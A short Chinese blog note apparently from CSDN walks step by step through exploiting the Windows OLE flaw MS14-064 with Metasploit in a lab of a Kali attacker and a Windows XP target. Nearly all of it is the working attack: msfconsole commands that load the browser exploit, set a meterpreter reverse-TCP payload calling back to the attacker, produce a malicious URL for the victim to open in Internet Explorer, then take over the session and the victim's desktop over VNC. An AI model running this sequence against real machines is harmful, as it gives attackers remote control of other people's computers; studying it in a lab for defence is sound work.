Metasploit MS14-064(OLE远程代码执行)漏洞-渗透笔记
作者:互联网
简介:
- Microsoft Windows OLE 远程代码执行漏洞,影响Win95+IE3 - Win10+IE11全版本。
- 这个漏洞就是 ,点击网址的时候不要默认ie哦~
- 记住tab健的作用,上一篇Metasploit信息收集已经介绍了,不知道的可以去看看。
- 本文用 # 作为注释。
环境:
- 攻击机:kali linux2.0 攻击机IP:192.168.2.111
- 靶机:Windows XP 靶机IP:192.168.2.114
1、ping 192.168.2.114 # 攻击ping靶机看能不能通
# ping到靶机了,现在就可以开始测试了。
2、msfconsole # kali终端打开
3、search ms14_064 # 查找 ms14-064漏洞
4、use exploit/windows/browser/ms14_064_ole_code_execution # 使用这个漏洞
5、show options # 查看需要设置的参数 yes就代表要设置的参数
6、set AllowPowershellPrompt true # 设置成开启
7、set SRVHOST 192.168.2.111 # 设置本机IP
8、set payload windows/meterpreter/reverse_tcp # 设置后渗透
9、show missing # 查看后渗透需要设置的参数
10、set LHOST 192.168.2.111 # 设置本机IP
11、run # 开始生成病毒网址
# http://192.168.2.111:8080/OzZUl3xnfA6L47 就是病毒网址
12、我们进入靶机使用 ie 打开这个网址
13、 我们返回攻击机查看是否有电脑连接了这个网址
# 可以看到192.168.2.114 这个IP连接了这个网址
14、sessions # 在kali终端回车查看sessions后台
# 我们可以通过session连接目标主机
15、sessions -i 1 # 通过Id进入会话
16、run vnc # 打开靶机桌面
# 我们已经成功,开启靶机桌面渗透结束。
完:多多使用 Tab健。
标签:Metasploit,set,OLE,IP,192.168,网址,代码执行,靶机,2.111 来源: https://blog.csdn.net/qq_55303694/article/details/120632994